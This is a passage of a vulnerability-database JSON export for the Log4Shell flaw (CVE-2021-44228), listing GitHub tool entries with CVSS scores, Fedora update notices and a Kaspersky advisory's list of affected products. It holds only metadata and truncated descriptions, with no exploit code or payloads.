"HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-19T19:37:48", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-22T15:04:11", "id": "E59C9A70-6F3E-5CF6-9F15-B0039E0FBAF1", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-13T08:29:58", "description": "#### #1 \u4f7f\u7528\u8bf4\u660e\n\nCVE-2021-44228 log4j 2.x rce\u6f0f\u6d1e\u68c0\u6d4b\u5de5\u5177\uff0c\u5bf9\u76ee\u6807\u94fe\u63a5\u53d1\u8d77get\u8bf7\u6c42\u5e76\u5229\u7528...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-24T02:31:47", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-13T06:33:39", "id": "AF93C0CA-BFDD-5C90-9D8D-55350790E1D1", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-11T13:19:29", "description": "# RASP CVE-2021-44228(Log4Shell)\n\n RASP for CVE-2021-44228 (**fo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T13:30:37", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-10T11:47:39", "id": "F594470D-2599-5B2E-B317-C9720581C07D", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-15T14:08:10", "description": "# Security Log4J Tester\n\nA vulnerability in Apache Log4j, a wide...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T14:46:08", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T15:04:49", "id": "C45EBEA7-DE2F-5373-9AA5-334E20EA2D23", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-15T11:15:49", "description": "# CVE-2021-44228 Spring Boot Test Service\nThis is a dirty hack s...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T13:05:26", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-15T10:01:39", "id": "5B6C990F-05A3-5D83-83DF-386A34FB8560", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-10T00:00:00", "description": "# cve-2021-44228-qingteng-online-patch \n\n## What is this\n\nHot-pa...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T15:30:55", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-07T10:44:22", "id": "8D0CF3A6-EC3F-536C-A424-08879FF2F158", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:16:34", "description": "# CVE-2021-44228 Remote Code Injection In Log4j\n\n\n```\n <d...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T07:18:15", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-12T03:47:13", "id": "97D358EF-90F6-5D12-981B-DAFEB56F784F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-16T17:14:26", "description": "# log4jScan\nsimple python scanner to check if your network is vu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T10:59:50", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-16T15:08:45", "id": "2E7FF2D4-97E7-54F5-A5C8-EACD22FCF303", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "fedora": [{"lastseen": "2021-12-14T17:05:10", "description": "Log4j is a tool to help the programmer output log statements to a variety of output targets. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T17:13:00", "type": "fedora", "title": "[SECURITY] Fedora 35 Update: log4j-2.15.0-1.fc35", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T17:13:00", "id": "FEDORA:59AA230A7074", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-23T00:53:13", "description": "Log4j is a tool to help the programmer output log statements to a variety of output targets. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T01:14:26", "type": "fedora", "title": "[SECURITY] Fedora 34 Update: log4j-2.16.0-1.fc34", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-22T01:14:26", "id": "FEDORA:A5A703103140", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/AWKZIIRNESRPVUVBP7NGANPKUZN54Q23/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-23T00:53:13", "description": "Jansi is a small java library that allows you to use ANSI escape sequences in your Java console applications. It implements ANSI support on platforms which don't support it like Windows and provides graceful degradation for when output is being sent to output devices which cannot support ANSI seque nces. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T01:14:26", "type": "fedora", "title": "[SECURITY] Fedora 34 Update: jansi-2.1.1-4.fc34", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-22T01:14:26", "id": "FEDORA:548FD3102AB0", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2022-01-19T17:34:10", "description": "### *Detect date*:\n12/10/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nRemote code execution vulnerability was found in Apache Log4j. Malicious users can exploit this vulnerability to execute arbitrary code.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nApache Log4j 2.0-beta9 before 2.15.0 \n3M Health Information Systems CGS \n7Signal Sapphire \nABB Remote Service \nAPC by Schneider Electric Powerchute Business Edition \nAPC by Schneider Electric Powerchute Network Shutdown \nAPI Portal for VMware Tanzu \nAbbott GLP Track System \nAccellion Kiteworks \nAccruent Analytics \nAccruent BigCenter \nAccruent Evoco \nAccruent Expesite \nAccruent Famis 360 \nAccruent Lucernex \nAccruent Meridian \nAccruent SiteFM3 \nAccruent SiteFM4 \nAccruent Siterra \nAccruent VxMaintain/VxObserve/VxSustain \nAcronis See link \nAdobe Automated Forms Conversion Service \nAdobe ColdFusion \nAdobe Experience Manager 6.4 Forms Designer \nAdobe Experience Manager 6.5 Forms Designer \nAkamai Siem Integration Connector \nAlertus Console \nAlphatron Custo diagnostics \nAmazon AMS \nAmazon API Gateway \nAmazon AWS API Gateway \nAmazon AWS AWS Certificate Manager \nAmazon AWS AWS Service Catalog \nAmazon AWS AppFlow \nAmazon AWS AppSync \nAmazon AWS CloudHSM \nAmazon AWS CodeBuild \nAmazon AWS CodePipeline \nAmazon AWS Connect \nAmazon AWS Directory Service \nAmazon AWS DynamoDB \nAmazon AWS EKS, ECS, Fargate \nAmazon AWS ELB \nAmazon AWS ElastiCache \nAmazon AWS Glue \nAmazon AWS Greengrass \nAmazon AWS Inspector \nAmazon AWS IoT SiteWise Edge \nAmazon AWS KMS \nAmazon AWS Kinesis Data Stream \nAmazon AWS Lambda \nAmazon AWS Polly \nAmazon AWS QuickSight \nAmazon AWS RDS \nAmazon AWS S3 \nAmazon AWS SNS \nAmazon AWS SQS \nAmazon AWS Secrets Manager \nAmazon AWS Systems Manager \nAmazon AWS Textract \nAmazon Athena \nAmazon Chime \nAmazon Cloud Directory \nAmazon CloudFront \nAmazon CloudWatch \nAmazon Cognito \nAmazon Connect \nAmazon DocumentDB \nAmazon DynamoDB \nAmazon EC2 \nAmazon ECR Public \nAmazon EMR \nAmazon ElastiCache \nAmazon Elastic Load Balancing \nAmazon EventBridge \nAmazon Fraud Detector \nAmazon Inspector \nAmazon Kafka (MSK) \nAmazon Kendra \nAmazon Keyspaces (for Apache Cassandra) \nAmazon Kinesis \nAmazon Lake Formation \nAmazon Lex \nAmazon Linux 2 (AL2) \nAmazon Lookout for Equipment \nAmazon MQ \nAmazon Macie \nAmazon Managed Workflows for Apache Airflow (MWAA) \nAmazon MemoryDB for Redis \nAmazon Monitron \nAmazon NICE \nAmazon Neptune \nAmazon OpenSearch \nAmazon Pinpoint \nAmazon RDS \nAmazon Redshift \nAmazon Rekognition \nAmazon Route53 \nAmazon S3 \nAmazon SageMaker \nAmazon Simple Notification Service (SNS) \nAmazon Simple Queue Service (SQS) \nAmazon Simple Workflow Service (SWF) \nAmazon Single Sign-On \nAmazon Step Functions \nAmazon Timestream \nAmazon VPC \nAmazon WorkSpaces/AppStream 2.0 \nApache Archiva \nApache Camel JBang \nApache Camel Karaf \nApache Druid \nApache Dubbo \nApache Flink \nApache Fortress \nApache Geode \nApache HBase \nApache Hadoop \nApache Hive \nApache JMeter \nApache JSPWiki \nApache James \nApache Jena \nApache Kafka \nApache Karaf \nApache NiFi \nApache OFBiz \nApache Ozone \nApache SOLR \nApache SkyWalking \nApache Struts \nApache Tapestry \nApache Tika \nApache TrafficControl \nApereo CAS \nApereo Opencast \nAppDynamics with Cisco Secure Application \nAppeon PowerBuilder \nAppian Platform \nAptible \nArcserve See link \nArduino IDE \nArista Networks Analytics Node for Converged Cloud Fabric (formerly Big Cloud Fabric) \nArista Networks Analytics Node for DANZ Monitoring Fabric (formerly Big Monitoring Fabric) \nArista Networks CloudVision Portal \nArista Networks CloudVision Wi-Fi, virtual appliance or physical appliance \nArista Networks Embedded Analytics for Converged Cloud Fabric (formerly Big Cloud Fabric) \nAtlassian Bamboo Server & Data Center \nAtlassian Bitbucket Server & Data Center \nAtlassian Confluence Server & Data Center \nAtlassian Confluence-CIS CSAT Pro \nAtlassian Confluence-CIS-CAT Lite \nAtlassian Confluence-CIS-CAT Pro Assessor v3 Full and Dissolvable \nAtlassian Confluence-CIS-CAT Pro Assessor v4 \nAtlassian Crowd Server & Data Center \nAtlassian Crucible \nAtlassian Fisheye \nAtlassian Jira Server & Data Center \nAtos Unify First Response OpenScape Policy Store \nAtos Unify OpenScape Contact Center \nAtos Unify OpenScape Contact Media Service \nAtos Unify OpenScape Enterprise Express \nAtos Unify OpenScape UC \nAtos Unify OpenScape Voice \nAutomation Anywhere Automation 360 Cloud \nAvaya Analytics \nAvaya Aura for OneCloud Private \nAvaya Aura\u00ae Application Enablement Services \nAvaya Aura\u00ae Contact Center \nAvaya Aura\u00ae Device Services \nAvaya Aura\u00ae Media Server \nAvaya Aura\u00ae Presence Services \nAvaya Aura\u00ae Session Manager \nAvaya Aura\u00ae System Manager \nAvaya Aura\u00ae Web Gateway \nAvaya Breeze\u2122 \nAvaya Business Rules Engine \nAvaya CRM Connector - Connected Desktop \nAvaya Callback Assist \nAvaya Contact Center Select \nAvaya Control Manager \nAvaya Device Enablement Service \nAvaya Device Enrollment Service \nAvaya Equinox\u2122 Conferencing \nAvaya IP Office\u2122 Platform \nAvaya Interaction Center \nAvaya Meetings \nAvaya OneCloud-Private \nAvaya Proactive Outreach Manager \nAvaya Session Border Controller for Enterprise \nAvaya Social Media Hub \nAvaya Workforce Engagement \nAvaya one cloud private -UCaaS - Mid Market Aura \nBCT LIBER \nBCT e-Invoice \nBMC AMI Ops Insight \nBMC Bladelogic Database Automation \nBMC Helix Data Manager \nBMC Helix ITSM \nBMC Helix Platform \nBMC Remedy Smart Reporting \nBMC TrueSight Automation Console \nBackblaze Cloud \nBarco OpSpace \nBeckman Coulter Information Systems \nBeyondTrust Privilege Management Reporting in BeyondInsight \nBioJava Java library for processing biological data \nBosch Rexroth Bosch IoT gateway \nBosch Security Systems PRAESENSA PRA-APAS \nBrian Pangburn SwingSet \nBroadcom CA Risk Authentication \nBroadcom CA Strong Authentication \nBroadcom Cloud Workload Assurance (CWA) \nBroadcom Cloud Workload Protection (CWP) \nBroadcom Cloud Workload Protection for Storage (CWP:S) \nBroadcom Email Security Service (ESS) \nBroadcom LiveUpdate Administrator (LUA) \nBroadcom Secure Access Cloud (SAC) \nBroadcom Symantec Advanced Authentication \nBroadcom Symantec Endpoint Detection and Response (EDR) \nBroadcom Symantec Endpoint Protection Manager (SEPM) \nBroadcom Symantec Endpoint Security (SES) \nBroadcom Symantec Privileged Access Manager (PAM) \nBroadcom VIP Authentication Hub \nBroadcom Web Isolation (WI) Cloud \nBroadcom Web Security Service (WSS) Reporting \nBrocade AMPOS V2.x and V3.x \nBrocade EZSwitch \nBrocade Fabric OS \nBrocade Network Advisor \nBrocade SANnav \nCIS CAT Lite \nCIS CAT Pro Assessor v3 Full and Dissolvable \nCIS CAT Pro Assessor v4 \nCIS CSAT Pro \nCanon Rialto \nCanon Solution Health (On-Prem) \nCanon VL Alphenix Angio Workstation (AWS) \nCanon Vitrea Advanced \nCanon Vitrea Connection \nCaseWare Cloud \nCisco AppDynamics \nCisco Application Policy Infrastructure Controller (APIC) - Network Insights Base App \nCisco Automated Subsea Tuning \nCisco BroadWorks \nCisco Business Process Automation \nCisco CX Cloud \nCisco Call Studio \nCisco Cloud Connect \nCisco CloudCenter \nCisco Cloudlock \nCisco Common Services Platform Collector (CSPC) \nCisco Computer Telephony Integration Object Server (CTIOS) \nCisco Connected Mobile Experiences (CMX) \nCisco Contact Center Domain Manager (CCDM) \nCisco Contact Center Management Portal (CCMP) \nCisco Crosswork Data Gateway \nCisco Crosswork Network Controller \nCisco Crosswork Optimization Engine \nCisco Crosswork Platform Infrastructure \nCisco Crosswork Situation Manager \nCisco Crosswork Zero Touch Provisioning (ZTP) \nCisco Cyber Vision Sensor Management Extension \nCisco DNA Center \nCisco DNA Spaces \nCisco Data Center Network Manager (DCNM) \nCisco Duo \nCisco Emergency Responder \nCisco Enterprise Chat and Email \nCisco Evolved Programmable Network Manager \nCisco Finesse \nCisco Firepower Threat Defense (FTD) managed by FDM \nCisco HyperFlex System \nCisco Hyperflex Storage Replication Adapter \nCisco IOx Fog Director \nCisco Identity Services Engine (ISE) \nCisco Integrated Management Controller (IMC) Supervisor \nCisco Intersight Virtual Appliance \nCisco MDS 9000 Series Multilayer Switches \nCisco Network Assurance Engine \nCisco Network Services Orchestrator (NSO) \nCisco Nexus Dashboard (formerly Cisco Application Services Engine) \nCisco Nexus Insights \nCisco Nexus switches \nCisco Packaged Contact Center Enterprise \nCisco SD-WAN vManage \nCisco UCS C-Series Rack Servers \u2013 Integrated Management Controller \nCisco UCS Central Software \nCisco UCS Director \nCisco UCS Manager \nCisco Unified Communications Manager Cloud \nCisco Unified Communications Manager IM & Presence Service (formerly CUPS) \nCisco Unified Contact Center Enterprise \nCisco Unified Contact Center Express \nCisco Unified Intelligent Contact Management Enterprise \nCisco Unified SIP Proxy Software \nCisco Unity Connection \nCisco Video Surveillance Operations Manager \nCisco Virtualized Infrastructure Manager \nCisco WAN Automation Engine (WAE) \nCisco Webex Cloud-Connected UC (CCUC) \nCisco Webex Meetings Server \nCisco Workload Optimization Manager \nCisco eSIM Flex \nCitrix Endpoint Management ( XenMobile Server) \nCitrix Endpoint Management (XenMobile Server) \nCitrix Virtual Apps and Desktops (XenApp & XenDesktop) \nClavister EasyAccess \nClavister InCenter \nCloud Mobility for Dell EMC Storage \nCloudera Ambari \nCloudera Arcadia Enterprise \nCloudera CDH, HDP, and HDF \nCloudera CDP Private Cloud Base \nCloudera CDS 3 Powered by Apache Spark \nCloudera CDS 3.2 for GPUs \nCloudera Cybersecurity Platform \nCloudera Data Engineering (CDE) \nCloudera Data Flow (CFM) \nCloudera Data Science Workbench (CDSW) \nCloudera Data Steward Studio (DSS) \nCloudera Data Visualization (CDV) \nCloudera Data Warehouse (CDW) \nCloudera DataFlow (CDF) \nCloudera Edge Management (CEM) \nCloudera Enterprise \nCloudera Flow Management (CFM) \nCloudera Hortonworks Data Platform (HDP) \nCloudera Machine Learning (CML) \nCloudera Management Console \nCloudera Manager (Including Backup Disaster Recovery (BDR) and Replication Manager) \nCloudera Replication Manager \nCloudera Runtime (including Data Hub and all Data Hub templates) \nCloudera Stream Processing (CSP) \nCloudera Streaming Analytics (CSA) \nCloudera Workload XM \nCloudogu Ecosystem \nCode42 App \nCode42 Crashplan \nCohesity Software \nCommvault \nComputer Vision Annotation Tool maintained by Intel \nConfluent Cloud \nConfluent Connectors \nConfluent ElasticSearch Sink Connector \nConfluent Google DataProc Sink Connector \nConfluent HDFS 2 Sink Connector \nConfluent HDFS 3 Sink Connector \nConfluent Platform \nConfluent Splunk Sink Connector \nConfluent VMWare Tanzu GemFire Sink Connector \nConfluent for Kubernetes \nConnect2id server \nConnectwise Perch \nContinuous Delivery for Puppet Enterprise \nContrast Hosted SaaS Enviroments \nContrast On-premises (EOP) Environments \nContrast Scan \nControlUp \nCoralogix \nCouchbase ElasticSearch connector \nCyberark Identity - Secure Web Sessions (SWS) \nCyberark Privilege Cloud - Service (SaaS) \nCyberark Remote Access (Alero) - Connector \nCyberark Remote Access (Alero) - Service (SaaS) \nDDN at Scale products \nDatadog Agent \nDatadogHQ datadog-kafka-connect-logs \nDatadogHQ datadog-lambda-java \nDatev DATEV Mittelstand Faktura and DATEV Mittelstand Faktura mit Rechnungswesen compact \nDatev DATEV Wages and Salaries compact \nDatev DATEV-SmartIT \nDatev DATEVasp \nDatev Jasper Reports \nDatev Lawyer's mailbox \nDebian Apache-log4j2 \nDecos JOIN Zaak & Document (Private Cloud) \nDell APEX Console \nDell APEX Data Storage Services \nDell Cloud IQ \nDell Connectrix (Cisco MDS DCNM) \nDell EMC APEX Console \nDell EMC APEX Data Storage Services \nDell EMC AppSync \nDell EMC Atmos \nDell EMC Avamar \nDell EMC BSN Controller Node \nDell EMC Centera \nDell EMC Chassis Management Controller (CMC) \nDell EMC Cloud Disaster Recovery \nDell EMC CloudLink \nDell EMC Cloudboost \nDell EMC Compellent \u2013 Dell Storage Manager Client \nDell EMC Connectrix (Brocade) \nDell EMC Connectrix (Cisco MDS 9000 switches) \nDell EMC Connectrix (Cisco MDS DCNM) \nDell EMC Connectrix B-Series SANnav \nDell EMC Container Storage Modules \nDell EMC Data Computing Appliance (DCA) \nDell EMC Data Domain 